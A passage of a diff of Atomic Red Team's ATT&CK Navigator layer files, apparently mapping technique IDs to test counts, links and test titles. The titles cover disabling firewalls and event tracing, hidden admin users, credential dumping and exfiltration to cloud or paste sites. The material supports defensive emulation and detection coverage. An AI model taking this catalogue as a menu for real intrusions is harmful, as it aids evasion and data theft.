Disable Windows Firewall using netsh firewall\n- ESXi - Disable Firewall via Esxcli\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n- Enumerate Windows Security Log via WevtUtil\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 646c375897..0b26e0b412 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json @@ -1 +1 @@ -{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1037.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"}]},{"techniqueID":"T1037.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1048.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}]},{"techniqueID":"T1055.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":51,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.002/T1059.002.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.004","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":22,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":67,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.002","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1078.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087.002","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"}]},{"techniqueID":"T1090","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1091","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1091/T1091.md"}]},{"techniqueID":"T1095","score":3,"enabled":true,"links":[{"label":"View 